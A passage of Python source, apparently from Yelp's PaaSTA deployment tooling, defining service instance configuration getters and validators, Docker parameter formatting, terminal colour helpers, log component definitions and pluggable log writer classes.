"service": self.service,
}
def get_cluster(self) -> str:
return self.cluster
def get_instance(self) -> str:
return self.instance
def get_service(self) -> str:
return self.service
@property
def job_id(self) -> str:
return self._job_id
def get_docker_registry(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> str:
return get_service_docker_registry(
self.service, self.soa_dir, system_config=system_paasta_config
)
def get_branch(self) -> str:
return get_paasta_branch(
cluster=self.get_cluster(), instance=self.get_instance()
)
def get_deploy_group(self) -> str:
return self.config_dict.get("deploy_group", self.get_branch())
def get_team(self) -> Optional[str]:
return self.config_dict.get("monitoring", {}).get("team", None)
def get_mem(self) -> float:
"""Gets the memory required from the service's configuration.
Defaults to 4096 (4G) if no value specified in the config.
:returns: The amount of memory specified by the config, 4096 if not specified"""
mem = self.config_dict.get("mem", 4096)
return mem
def get_mem_swap(self) -> str:
"""Gets the memory-swap value. This value is passed to the docker
container to ensure that the total memory limit (memory + swap) is the
same value as the 'mem' key in soa-configs. Note - this value *has* to
be >= the mem key, so we always round up to the closest MB and add an
additional 64MB for the docker executor (See PAASTA-12450).
"""
mem = self.get_mem()
mem_swap = int(math.ceil(mem + 64))
return "%sm" % mem_swap
def get_cpus(self) -> float:
"""Gets the number of cpus required from the service's configuration.
Defaults to 1 cpu if no value specified in the config.
:returns: The number of cpus specified in the config, 1 if not specified"""
cpus = self.config_dict.get("cpus", 1)
return cpus
def get_cpu_burst_add(self) -> float:
"""Returns the number of additional cpus a container is allowed to use.
Defaults to DEFAULT_CPU_BURST_ADD"""
return self.config_dict.get("cpu_burst_add", DEFAULT_CPU_BURST_ADD)
def get_cpu_period(self) -> float:
"""The --cpu-period option to be passed to docker
Comes from the cfs_period_us configuration option
:returns: The number to be passed to the --cpu-period docker flag"""
return self.config_dict.get("cfs_period_us", DEFAULT_CPU_PERIOD)
def get_cpu_quota(self) -> float:
"""Gets the --cpu-quota option to be passed to docker
Calculation: (cpus + cpus_burst_add) * cfs_period_us
:returns: The number to be passed to the --cpu-quota docker flag"""
cpu_burst_add = self.get_cpu_burst_add()
return (self.get_cpus() + cpu_burst_add) * self.get_cpu_period()
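# Worked example of the quota calculation (hypothetical cpus value): with cpus=0.5 and
# the defaults cpu_burst_add=1 and cfs_period_us=100000, the quota is
# (0.5 + 1) * 100000 == 150000, i.e. the container may burst up to 1.5 CPUs.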
def get_extra_docker_args(self) -> Dict[str, str]:
return self.config_dict.get("extra_docker_args", {})
def get_cap_add(self) -> Iterable[DockerParameter]:
"""Get the --cap-add options to be passed to docker
Generated from the cap_add configuration option, which is a list of
capabilities.
Example configuration: {'cap_add': ['IPC_LOCK', 'SYS_PTRACE']}
:returns: A generator of cap_add options to be passed as --cap-add flags"""
for value in self.config_dict.get("cap_add", []):
yield {"key": "cap-add", "value": f"{value}"}
def get_cap_drop(self) -> Iterable[DockerParameter]:
"""Generates --cap-drop options to be passed to docker by default, which
prevents the container from performing privilege escalation.
https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities
"""
for cap in CAPS_DROP:
yield {"key": "cap-drop", "value": cap}
def format_docker_parameters(
self,
with_labels: bool = True,
system_paasta_config: Optional["SystemPaastaConfig"] = None,
) -> List[DockerParameter]:
"""Formats extra flags for running docker. Will be added in the format
`["--%s=%s" % (e['key'], e['value']) for e in list]` to the `docker run` command
Note: values must be strings
:param with_labels: Whether to build docker parameters with or without labels
:returns: A list of parameters to be added to docker run"""
parameters: List[DockerParameter] = [
{"key": "memory-swap", "value": self.get_mem_swap()},
{"key": "cpu-period", "value": "%s" % int(self.get_cpu_period())},
{"key": "cpu-quota", "value": "%s" % int(self.get_cpu_quota())},
]
if self.use_docker_disk_quota(system_paasta_config=system_paasta_config):
parameters.append(
{
"key": "storage-opt",
"value": f"size={int(self.get_disk() * 1024 * 1024)}",
}
)
if with_labels:
parameters.extend(
[
{"key": "label", "value": "paasta_service=%s" % self.service},
{"key": "label", "value": "paasta_instance=%s" % self.instance},
]
)
extra_docker_args = self.get_extra_docker_args()
if extra_docker_args:
for key, value in extra_docker_args.items():
parameters.extend([{"key": key, "value": value}])
parameters.extend(self.get_cap_add())
parameters.extend(self.get_docker_init())
parameters.extend(self.get_cap_drop())
return parameters
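# Illustrative return value (hypothetical service/instance, defaults everywhere,
# labels enabled, disk quota enforcement off); each entry becomes a "--<key>=<value>"
# flag on `docker run`:
#
#     [
#         {"key": "memory-swap", "value": "4160m"},
#         {"key": "cpu-period", "value": "100000"},
#         {"key": "cpu-quota", "value": "200000"},
#         {"key": "label", "value": "paasta_service=example_service"},
#         {"key": "label", "value": "paasta_instance=main"},
#         {"key": "init", "value": "true"},
#         {"key": "cap-drop", "value": "SETPCAP"},
#         ...  # one cap-drop entry per capability in CAPS_DROP
#     ]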
def use_docker_disk_quota(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> bool:
if system_paasta_config is None:
system_paasta_config = load_system_paasta_config()
return system_paasta_config.get_enforce_disk_quota()
def get_docker_init(self) -> Iterable[DockerParameter]:
return [{"key": "init", "value": "true"}]
def get_disk(self, default: float = 1024) -> float:
"""Gets the amount of disk space in MiB required from the service's configuration.
Defaults to 1024 (1GiB) if no value is specified in the config.
:returns: The amount of disk space specified by the config, 1024 MiB if not specified"""
disk = self.config_dict.get("disk", default)
return disk
def get_gpus(self) -> Optional[int]:
"""Gets the number of gpus required from the service's configuration.
Defaults to None if no value is specified in the config.
:returns: The number of gpus specified by the config, None if not specified"""
gpus = self.config_dict.get("gpus", None)
return gpus
def get_container_type(self) -> Optional[str]:
"""Get Mesos containerizer type.
Defaults to DOCKER if gpus are not used.
:returns: Mesos containerizer type, DOCKER or MESOS"""
if self.get_gpus() is not None:
container_type = "MESOS"
else:
container_type = "DOCKER"
return container_type
def get_cmd(self) -> Optional[Union[str, List[str]]]:
"""Get the docker cmd specified in the service's configuration.
Defaults to None if not specified in the config.
:returns: A string specified in the config, None if not specified"""
return self.config_dict.get("cmd", None)
def get_instance_type(self) -> Optional[str]:
return getattr(self, "config_filename_prefix", None)
def get_env_dictionary(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> Dict[str, str]:
"""A dictionary of key/value pairs that represent environment variables
to be injected to the container environment"""
env = {
"PAASTA_SERVICE": self.service,
"PAASTA_INSTANCE": self.instance,
"PAASTA_CLUSTER": self.cluster,
"PAASTA_DEPLOY_GROUP": self.get_deploy_group(),
"PAASTA_DOCKER_IMAGE": self.get_docker_image(),
"PAASTA_RESOURCE_CPUS": str(self.get_cpus()),
"PAASTA_RESOURCE_MEM": str(self.get_mem()),
"PAASTA_RESOURCE_DISK": str(self.get_disk()),
}
if self.get_gpus() is not None:
env["PAASTA_RESOURCE_GPUS"] = str(self.get_gpus())
try:
env["PAASTA_GIT_SHA"] = get_git_sha_from_dockerurl(
self.get_docker_url(system_paasta_config=system_paasta_config)
)
except Exception:
pass
team = self.get_team()
if team:
env["PAASTA_MONITORING_TEAM"] = team
instance_type = self.get_instance_type()
if instance_type:
env["PAASTA_INSTANCE_TYPE"] = instance_type
user_env = self.config_dict.get("env", {})
env.update(user_env)
return {str(k): str(v) for (k, v) in env.items()}
def get_env(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> Dict[str, str]:
"""Basic get_env that simply returns the basic env, other classes
might need to override this getter for more implementation-specific
env getting"""
return self.get_env_dictionary(system_paasta_config=system_paasta_config)
def get_args(self) -> Optional[List[str]]:
"""Get the docker args specified in the service's configuration.
If not specified in the config and if cmd is not specified, defaults to an empty array.
If not specified in the config but cmd is specified, defaults to None.
If specified in the config and if cmd is also specified, throws an exception. Only one may be specified.
:param service_config: The service instance's configuration dictionary
:returns: An array of args specified in the config,
``[]`` if not specified and if cmd is not specified,
otherwise None if not specified but cmd is specified"""
if self.get_cmd() is None:
return self.config_dict.get("args", [])
else:
args = self.config_dict.get("args", None)
if args is None:
return args
else:
# TODO validation stuff like this should be moved into a check_*
raise InvalidInstanceConfig(
"Instance configuration can specify cmd or args, but not both."
)
def get_monitoring(self) -> MonitoringDict:
"""Get monitoring overrides defined for the given instance"""
return self.config_dict.get("monitoring", {})
def get_deploy_constraints(
self,
blacklist: DeployBlacklist,
whitelist: DeployWhitelist,
system_deploy_blacklist: DeployBlacklist,
system_deploy_whitelist: DeployWhitelist,
) -> List[Constraint]:
"""Return the combination of deploy_blacklist and deploy_whitelist
as a list of constraints.
"""
return (
deploy_blacklist_to_constraints(blacklist)
+ deploy_whitelist_to_constraints(whitelist)
+ deploy_blacklist_to_constraints(system_deploy_blacklist)
+ deploy_whitelist_to_constraints(system_deploy_whitelist)
)
def get_deploy_blacklist(self) -> DeployBlacklist:
"""The deploy blacklist is a list of lists, where the lists indicate
which locations the service should not be deployed to"""
return safe_deploy_blacklist(self.config_dict.get("deploy_blacklist", []))
def get_deploy_whitelist(self) -> DeployWhitelist:
"""The deploy whitelist is a tuple of (location_type, [allowed value, allowed value, ...]).
To have tasks scheduled on it, a host must be covered by the deploy whitelist (if present) and not excluded by
the deploy blacklist."""
return safe_deploy_whitelist(self.config_dict.get("deploy_whitelist"))
def get_docker_image(self) -> str:
"""Get the docker image name (with tag) for a given service branch from
a generated deployments.json file."""
if self.branch_dict is not None:
return self.branch_dict["docker_image"]
else:
return ""
def get_docker_url(
self, system_paasta_config: Optional["SystemPaastaConfig"] = None
) -> str:
"""Compose the docker url.
:returns: '<registry_uri>/<docker_image>'
"""
registry_uri = self.get_docker_registry(
system_paasta_config=system_paasta_config
)
docker_image = self.get_docker_image()
if not docker_image:
raise NoDockerImageError(
"Docker url not available because there is no docker_image"
)
docker_url = f"{registry_uri}/{docker_image}"
return docker_url
def get_desired_state(self) -> str:
"""Get the desired state (either 'start' or 'stop') for a given service
branch from a generated deployments.json file."""
if self.branch_dict is not None:
return self.branch_dict["desired_state"]
else:
return "start"
def get_force_bounce(self) -> Optional[str]:
"""Get the force_bounce token for a given service branch from a generated
deployments.json file. This is a token that, when changed, indicates that
the instance should be recreated and bounced, even if no other
parameters have changed. This may be None or a string, generally a
timestamp.
"""
if self.branch_dict is not None:
return self.branch_dict["force_bounce"]
else:
return None
def check_cpus(self) -> Tuple[bool, str]:
cpus = self.get_cpus()
if cpus is not None:
if not isinstance(cpus, (float, int)):
return (
False,
'The specified cpus value "%s" is not a valid float or int.' % cpus,
)
return True, ""
def check_mem(self) -> Tuple[bool, str]:
mem = self.get_mem()
if mem is not None:
if not isinstance(mem, (float, int)):
return (
False,
'The specified mem value "%s" is not a valid float or int.' % mem,
)
return True, ""
def check_disk(self) -> Tuple[bool, str]:
disk = self.get_disk()
if disk is not None:
if not isinstance(disk, (float, int)):
return (
False,
'The specified disk value "%s" is not a valid float or int.' % disk,
)
return True, ""
def check_security(self) -> Tuple[bool, str]:
security = self.config_dict.get("security")
if security is None:
return True, ""
inbound_firewall = security.get("inbound_firewall")
outbound_firewall = security.get("outbound_firewall")
if inbound_firewall is None and outbound_firewall is None:
return True, ""
if inbound_firewall is not None and inbound_firewall not in (
"allow",
"reject",
):
return (
False,
'Unrecognized inbound_firewall value "%s"' % inbound_firewall,
)
if outbound_firewall is not None and outbound_firewall not in (
"block",
"monitor",
):
return (
False,
'Unrecognized outbound_firewall value "%s"' % outbound_firewall,
)
unknown_keys = set(security.keys()) - {
"inbound_firewall",
"outbound_firewall",
}
if unknown_keys:
return (
False,
'Unrecognized items in security dict of service config: "%s"'
% ",".join(unknown_keys),
)
return True, ""
def check_dependencies_reference(self) -> Tuple[bool, str]:
dependencies_reference = self.config_dict.get("dependencies_reference")
if dependencies_reference is None:
return True, ""
dependencies = self.config_dict.get("dependencies")
if dependencies is None:
return (
False,
'dependencies_reference "%s" declared but no dependencies found'
% dependencies_reference,
)
if dependencies_reference not in dependencies:
return (
False,
'dependencies_reference "%s" not found in dependencies dictionary'
% dependencies_reference,
)
return True, ""
def check(self, param: str) -> Tuple[bool, str]:
check_methods = {
"cpus": self.check_cpus,
"mem": self.check_mem,
"security": self.check_security,
"dependencies_reference": self.check_dependencies_reference,
"deploy_group": self.check_deploy_group,
}
check_method = check_methods.get(param)
if check_method is not None:
return check_method()
else:
return (
False,
'Your service config specifies "%s", an unsupported parameter.' % param,
)
def validate(self, params: Optional[List[str]] = None) -> List[str]:
if params is None:
params = [
"cpus",
"mem",
"security",
"dependencies_reference",
"deploy_group",
]
error_msgs = []
for param in params:
check_passed, check_msg = self.check(param)
if not check_passed:
error_msgs.append(check_msg)
return error_msgs
def check_deploy_group(self) -> Tuple[bool, str]:
deploy_group = self.get_deploy_group()
if deploy_group is not None:
pipeline_deploy_groups = get_pipeline_deploy_groups(
service=self.service, soa_dir=self.soa_dir
)
if deploy_group not in pipeline_deploy_groups:
return (
False,
f"{self.service}.{self.instance} uses deploy_group {deploy_group}, but it is not deploy.yaml",
) # noqa: E501
return True, ""
def get_extra_volumes(self) -> List[DockerVolume]:
"""Extra volumes are a specially formatted list of dictionaries that should
be bind mounted in a container. The format of the dictionaries should
conform to the `Mesos container volumes spec
<https://mesosphere.github.io/marathon/docs/native-docker.html>`_"""
return self.config_dict.get("extra_volumes", [])
def get_aws_ebs_volumes(self) -> List[AwsEbsVolume]:
return self.config_dict.get("aws_ebs_volumes", [])
def get_secret_volumes(self) -> List[SecretVolume]:
return self.config_dict.get("secret_volumes", [])
def get_iam_role(self) -> str:
return self.config_dict.get("iam_role", "")
def get_iam_role_provider(self) -> str:
return self.config_dict.get("iam_role_provider", "kiam")
def get_role(self) -> Optional[str]:
"""Which mesos role of nodes this job should run on.
"""
return self.config_dict.get("role")
def get_pool(self) -> str:
"""Which pool of nodes this job should run on. This can be used to mitigate noisy neighbors, by putting
particularly noisy or noise-sensitive jobs into different pools.
This is implemented with an attribute "pool" on each mesos slave and by adding a constraint or node selector.
Eventually this may be implemented with Mesos roles, once a framework can register under multiple roles.
:returns: the "pool" attribute in your config dict, or the string "default" if not specified."""
return self.config_dict.get("pool", "default")
def get_pool_constraints(self) -> List[Constraint]:
pool = self.get_pool()
return [["pool", "LIKE", pool]]
def get_constraints(self) -> Optional[List[Constraint]]:
return stringify_constraints(self.config_dict.get("constraints", None))
def get_extra_constraints(self) -> List[Constraint]:
return stringify_constraints(self.config_dict.get("extra_constraints", []))
def get_net(self) -> str:
"""
:returns: the docker networking mode the container should be started with.
"""
return self.config_dict.get("net", "bridge")
def get_volumes(self, system_volumes: Sequence[DockerVolume]) -> List[DockerVolume]:
volumes = list(system_volumes) + list(self.get_extra_volumes())
return _reorder_docker_volumes(volumes)
def get_persistent_volumes(self) -> Sequence[PersistentVolume]:
return self.config_dict.get("persistent_volumes", [])
def get_dependencies_reference(self) -> Optional[str]:
"""Get the reference to an entry in dependencies.yaml
Defaults to None if not specified in the config.
:returns: A string specified in the config, None if not specified"""
return self.config_dict.get("dependencies_reference")
def get_dependencies(self) -> Optional[Dict]:
"""Get the contents of the dependencies_dict pointed to by the dependency_reference or
'main' if no dependency_reference exists
Defaults to None if not specified in the config.
:returns: The dictionary from the dependencies dict for the selected reference, None if not specified"""
dependencies = self.config_dict.get("dependencies")
if not dependencies:
return None
dependency_ref = self.get_dependencies_reference() or "main"
return dependencies.get(dependency_ref)
def get_inbound_firewall(self) -> Optional[str]:
"""Return 'allow', 'reject', or None as configured in security->inbound_firewall
Defaults to None if not specified in the config
Setting this to a value other than `allow` is uncommon, as doing so will restrict the
availability of your service. The only other supported value is `reject` currently,
which will reject all remaining inbound traffic to the service port after all other rules.
This option exists primarily for sensitive services that wish to opt into this functionality.
:returns: A string specified in the config, None if not specified"""
security = self.config_dict.get("security")
if not security:
return None
return security.get("inbound_firewall")
def get_outbound_firewall(self) -> Optional[str]:
"""Return 'block', 'monitor', or None as configured in security->outbound_firewall
Defaults to None if not specified in the config
:returns: A string specified in the config, None if not specified"""
security = self.config_dict.get("security")
if not security:
return None
return security.get("outbound_firewall")
def __eq__(self, other: Any) -> bool:
if isinstance(other, type(self)):
return (
self.config_dict == other.config_dict
and self.branch_dict == other.branch_dict
and self.cluster == other.cluster
and self.instance == other.instance
and self.service == other.service
)
else:
return False
def stringify_constraint(usc: UnstringifiedConstraint) -> Constraint:
return [str(x) for x in usc]
def stringify_constraints(
uscs: Optional[List[UnstringifiedConstraint]],
) -> Optional[List[Constraint]]:
if uscs is None:
return None
return [stringify_constraint(usc) for usc in uscs]
@time_cache(ttl=60)
def validate_service_instance(
service: str, instance: str, cluster: str, soa_dir: str
) -> str:
possibilities: List[str] = []
for instance_type in INSTANCE_TYPES:
sis = get_service_instance_list(
service=service,
cluster=cluster,
instance_type=instance_type,
soa_dir=soa_dir,
)
if (service, instance) in sis:
return instance_type
possibilities.extend(si[1] for si in sis)
else:
suggestions = suggest_possibilities(word=instance, possibilities=possibilities)
raise NoConfigurationForServiceError(
f"Error: {compose_job_id(service, instance)} doesn't look like it has been configured "
f"to run on the {cluster} cluster.{suggestions}"
)
_ComposeRetT = TypeVar("_ComposeRetT")
_ComposeInnerRetT = TypeVar("_ComposeInnerRetT")
def compose(
func_one: Callable[[_ComposeInnerRetT], _ComposeRetT],
func_two: Callable[..., _ComposeInnerRetT],
) -> Callable[..., _ComposeRetT]:
def composed(*args: Any, **kwargs: Any) -> _ComposeRetT:
return func_one(func_two(*args, **kwargs))
return composed
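# Illustrative composition (this is how app_output is colored below):
# compose(PaastaColors.yellow, PaastaColors.bold) returns a callable equivalent to
# lambda text: PaastaColors.yellow(PaastaColors.bold(text)), i.e. bold is applied
# first and the result is then wrapped in yellow.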
class PaastaColors:
"""Collection of static variables and methods to assist in coloring text."""
# ANSI color codes
BLUE = "\033[34m"
BOLD = "\033[1m"
CYAN = "\033[36m"
DEFAULT = "\033[0m"
GREEN = "\033[32m"
GREY = "\033[38;5;242m"
MAGENTA = "\033[35m"
RED = "\033[31m"
YELLOW = "\033[33m"
@staticmethod
def bold(text: str) -> str:
"""Return bolded text.
:param text: a string
:return: text color coded with ANSI bold
"""
return PaastaColors.color_text(PaastaColors.BOLD, text)
@staticmethod
def blue(text: str) -> str:
"""Return text that can be printed blue.
:param text: a string
:return: text color coded with ANSI blue
"""
return PaastaColors.color_text(PaastaColors.BLUE, text)
@staticmethod
def green(text: str) -> str:
"""Return text that can be printed green.
:param text: a string
:return: text color coded with ANSI green"""
return PaastaColors.color_text(PaastaColors.GREEN, text)
@staticmethod
def red(text: str) -> str:
"""Return text that can be printed red.
:param text: a string
:return: text color coded with ANSI red"""
return PaastaColors.color_text(PaastaColors.RED, text)
@staticmethod
def magenta(text: str) -> str:
"""Return text that can be printed magenta.
:param text: a string
:return: text color coded with ANSI magenta"""
return PaastaColors.color_text(PaastaColors.MAGENTA, text)
@staticmethod
def color_text(color: str, text: str) -> str:
"""Return text that can be printed color.
:param color: ANSI color code
:param text: a string
:return: a string with ANSI color encoding"""
# any time text returns to default, we want to insert our color.
replaced = text.replace(PaastaColors.DEFAULT, PaastaColors.DEFAULT + color)
# then wrap the beginning and end in our color/default.
return color + replaced + PaastaColors.DEFAULT
@staticmethod
def cyan(text: str) -> str:
"""Return text that can be printed cyan.
:param text: a string
:return: text color coded with ANSI cyan"""
return PaastaColors.color_text(PaastaColors.CYAN, text)
@staticmethod
def yellow(text: str) -> str:
"""Return text that can be printed yellow.
:param text: a string
:return: text color coded with ANSI yellow"""
return PaastaColors.color_text(PaastaColors.YELLOW, text)
@staticmethod
def grey(text: str) -> str:
return PaastaColors.color_text(PaastaColors.GREY, text)
@staticmethod
def default(text: str) -> str:
return PaastaColors.color_text(PaastaColors.DEFAULT, text)
LOG_COMPONENTS: Mapping[str, Mapping[str, Any]] = OrderedDict(
[
(
"build",
{
"color": PaastaColors.blue,
"help": (
"Logs for pre-deployment steps, such as itests, "
"image building, and security checks."
),
"source_env": "devc",
},
),
(
"deploy",
{
"color": PaastaColors.cyan,
"help": (
"Logs for deployment steps and actions, such as "
"bouncing, start/stop/restart, and instance cleanup."
),
"additional_source_envs": ["devc"],
},
),
(
"monitoring",
{
"color": PaastaColors.green,
"help": "Logs from Sensu checks for the service",
},
),
(
"marathon",
{
"color": PaastaColors.magenta,
"help": "Logs from Marathon for the service (deprecated).",
},
),
(
"app_output",
{
"color": compose(PaastaColors.yellow, PaastaColors.bold),
"help": (
"Stderr and stdout from a service's running processes. "
"Alias for both the stdout and stderr components."
),
},
),
(
"stdout",
{
"color": PaastaColors.yellow,
"help": "Stdout from a service's running processes.",
},
),
(
"stderr",
{
"color": PaastaColors.yellow,
"help": "Stderr from a service's running processes.",
},
),
(
"security",
{
"color": PaastaColors.red,
"help": "Logs from security-related services such as firewall monitoring",
},
),
("oom", {"color": PaastaColors.red, "help": "Kernel OOM events."}),
(
"task_lifecycle",
{
"color": PaastaColors.bold,
"help": "Logs that tell you about task startup, failures, healthchecks, etc.",
},
),
# I'm leaving these planned components here since they provide some hints
# about where we want to go. See PAASTA-78.
#
# But I'm commenting them out so they don't delude users into believing we
# can expose logs that we cannot actually expose. See PAASTA-927.
#
# ('app_request', {
# 'color': PaastaColors.bold,
# 'help': 'The request log for the service. Defaults to "service_NAME_requests"',
# 'command': 'scribe_reader -e ENV -f service_example_happyhour_requests',
# }),
# ('app_errors', {
# 'color': PaastaColors.red,
# 'help': 'Application error log, defaults to "stream_service_NAME_errors"',
# 'command': 'scribe_reader -e ENV -f stream_service_SERVICE_errors',
# }),
# ('lb_requests', {
# 'color': PaastaColors.bold,
# 'help': 'All requests from Smartstack haproxy',
# 'command': 'NA - TODO: SRV-1130',
# }),
# ('lb_errors', {
# 'color': PaastaColors.red,
# 'help': 'Logs from Smartstack haproxy that have 400-500 error codes',
# 'command': 'scribereader -e ENV -f stream_service_errors | grep SERVICE.instance',
# }),
]
)
class NoSuchLogComponent(Exception):
pass
def validate_log_component(component: str) -> bool:
if component in LOG_COMPONENTS.keys():
return True
else:
raise NoSuchLogComponent
def get_git_url(service: str, soa_dir: str = DEFAULT_SOA_DIR) -> str:
"""Get the git url for a service. Assumes that the service's
repo matches its name, and that it lives under services/, i.e.
if this is called with the string 'test', the returned
url will be git@github.yelpcorp.com:services/test.
:param service: The service name to get a URL for
:returns: A git url to the service's repository"""
general_config = service_configuration_lib.read_service_configuration(
service, soa_dir=soa_dir
)
# TODO: PAASTA-16927: get this from system config `.git_config`
default_location = format_git_url(
"git", "github.yelpcorp.com", f"services/{service}"
)
return general_config.get("git_url", default_location)
def format_git_url(git_user: str, git_server: str, repo_name: str) -> str:
return f"{git_user}@{git_server}:{repo_name}"
def get_service_docker_registry(
service: str,
soa_dir: str = DEFAULT_SOA_DIR,
system_config: Optional["SystemPaastaConfig"] = None,
) -> str:
if service is None:
raise NotImplementedError('"None" is not a valid service')
service_configuration = service_configuration_lib.read_service_configuration(
service, soa_dir
)
try:
return service_configuration["docker_registry"]
except KeyError:
if not system_config:
system_config = load_system_paasta_config()
return system_config.get_system_docker_registry()
class NoSuchLogLevel(Exception):
pass
class LogWriterConfig(TypedDict):
driver: str
options: Dict
class LogReaderConfig(TypedDict):
driver: str
options: Dict
# The active log writer.
_log_writer = None
# The map of name -> LogWriter subclasses, used by configure_log.
_log_writer_classes = {}
class LogWriter:
def __init__(self, **kwargs: Any) -> None:
pass
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
raise NotImplementedError()
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
raise NotImplementedError()
_LogWriterTypeT = TypeVar("_LogWriterTypeT", bound=Type[LogWriter])
def register_log_writer(name: str) -> Callable[[_LogWriterTypeT], _LogWriterTypeT]:
"""Returns a decorator that registers that log writer class at a given name
so get_log_writer_class can find it."""
def outer(log_writer_class: _LogWriterTypeT) -> _LogWriterTypeT:
_log_writer_classes[name] = log_writer_class
return log_writer_class
return outer
def get_log_writer_class(name: str) -> Type[LogWriter]:
return _log_writer_classes[name]
def list_log_writers() -> Iterable[str]:
return _log_writer_classes.keys()
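# Illustrative registration of a custom writer through the decorator above
# (hypothetical class, shown as a sketch):
#
#     @register_log_writer("stdout")
#     class StdoutLogWriter(LogWriter):
#         def log(self, service, line, component, level=DEFAULT_LOGLEVEL,
#                 cluster=ANY_CLUSTER, instance=ANY_INSTANCE):
#             print(format_log_line(level, cluster, service, instance, component, line))
#
#     get_log_writer_class("stdout")  # -> StdoutLogWriter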
def configure_log() -> None:
"""We will log to the yocalhost binded scribe."""
log_writer_config = load_system_paasta_config().get_log_writer()
global _log_writer
LogWriterClass = get_log_writer_class(log_writer_config["driver"])
_log_writer = LogWriterClass(**log_writer_config.get("options", {}))
def _log(
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
if _log_writer is None:
configure_log()
return _log_writer.log(
service=service,
line=line,
component=component,
level=level,
cluster=cluster,
instance=instance,
)
def _log_audit(
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
if _log_writer is None:
configure_log()
user = get_username()
host = get_hostname()
return _log_writer.log_audit(
user=user,
host=host,
action=action,
action_details=action_details,
service=service,
cluster=cluster,
instance=instance,
)
def _now() -> str:
return datetime.datetime.utcnow().isoformat()
def remove_ansi_escape_sequences(line: str) -> str:
"""Removes ansi escape sequences from the given line."""
return no_escape.sub("", line)
def format_log_line(
level: str,
cluster: str,
service: str,
instance: str,
component: str,
line: str,
timestamp: str = None,
) -> str:
"""Accepts a string 'line'.
Returns an appropriately-formatted dictionary which can be serialized to
JSON for logging and which contains 'line'.
"""
validate_log_component(component)
if not timestamp:
timestamp = _now()
line = remove_ansi_escape_sequences(line.strip())
message = json.dumps(
{
"timestamp": timestamp,
"level": level,
"cluster": cluster,
"service": service,
"instance": instance,
"component": component,
"message": line,
},
sort_keys=True,
)
return message
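# Illustrative result (hypothetical field values; output wrapped here for readability):
#
#     format_log_line("event", "norcal-devc", "example_service", "main", "deploy", "it worked")
#     # -> '{"cluster": "norcal-devc", "component": "deploy", "instance": "main",
#     #      "level": "event", "message": "it worked", "service": "example_service",
#     #      "timestamp": "2021-01-01T00:00:00.000000"}'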
def format_audit_log_line(
cluster: str,
instance: str,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
timestamp: str = None,
) -> str:
"""Accepts:
* a string 'user' describing the user that initiated the action
* a string 'host' describing the server where the user initiated the action
* a string 'action' describing an action performed by paasta_tools
* a dict 'action_details' containing optional information about the action
Returns an appropriately-formatted dictionary which can be serialized to
JSON for logging and which contains details about an action performed on
a service/instance.
"""
if not timestamp:
timestamp = _now()
if not action_details:
action_details = {}
message = json.dumps(
{
"timestamp": timestamp,
"cluster": cluster,
"service": service,
"instance": instance,
"user": user,
"host": host,
"action": action,
"action_details": action_details,
},
sort_keys=True,
)
return message
def get_log_name_for_service(service: str, prefix: str = None) -> str:
if prefix:
return f"stream_paasta_{prefix}_{service}"
return "stream_paasta_%s" % service
try:
import clog
# Somehow clog turns on DeprecationWarnings, so we need to disable them
# again after importing it.
warnings.filterwarnings("ignore", category=DeprecationWarning)
class CLogWriter(LogWriter):
def __init__(self, **kwargs: Any):
clog.config.configure(**kwargs)
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
"""This expects someone (currently the paasta cli main()) to have already
configured the log object. We'll just write things to it.
"""
if level == "event":
print(f"[service {service}] {line}", file=sys.stdout)
elif level == "debug":
print(f"[service {service}] {line}", file=sys.stderr)
else:
raise NoSuchLogLevel
log_name = get_log_name_for_service(service)
formatted_line = format_log_line(
level, cluster, service, instance, component, line
)
clog.log_line(log_name, formatted_line)
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
log_name = AUDIT_LOG_STREAM
formatted_line = format_audit_log_line(
user=user,
host=host,
action=action,
action_details=action_details,
service=service,
cluster=cluster,
instance=instance,
)
clog.log_line(log_name, formatted_line)
@register_log_writer("monk")
class MonkLogWriter(CLogWriter):
def __init__(
self,
monk_host: str = "169.254.255.254",
monk_port: int = 1473,
monk_disable: bool = False,
**kwargs: Any,
) -> None:
super().__init__(
monk_host=monk_host, monk_port=monk_port, monk_disable=monk_disable,
)
@register_log_writer("scribe")
class ScribeLogWriter(CLogWriter):
def __init__(
self,
scribe_host: str = "169.254.255.254",
scribe_port: int = 1463,
scribe_disable: bool = False,
**kwargs: Any,
) -> None:
super().__init__(
scribe_host=scribe_host,
scribe_port=scribe_port,
scribe_disable=scribe_disable,
)
except ImportError:
warnings.warn("clog is unavailable")
@register_log_writer("null")
class NullLogWriter(LogWriter):
"""A LogWriter class that doesn't do anything. Primarily useful for integration tests where we don't care about
logs."""
def __init__(self, **kwargs: Any) -> None:
pass
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
pass
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
pass
@contextlib.contextmanager
def _empty_context() -> Iterator[None]:
yield
_AnyIO = Union[io.IOBase, IO]
@register_log_writer("file")
class FileLogWriter(LogWriter):
def __init__(
self,
path_format: str,
mode: str = "a+",
line_delimiter: str = "\n",
flock: bool = False,
) -> None:
self.path_format = path_format
self.mode = mode
self.flock = flock
self.line_delimiter = line_delimiter
def maybe_flock(self, fd: _AnyIO) -> ContextManager:
if self.flock:
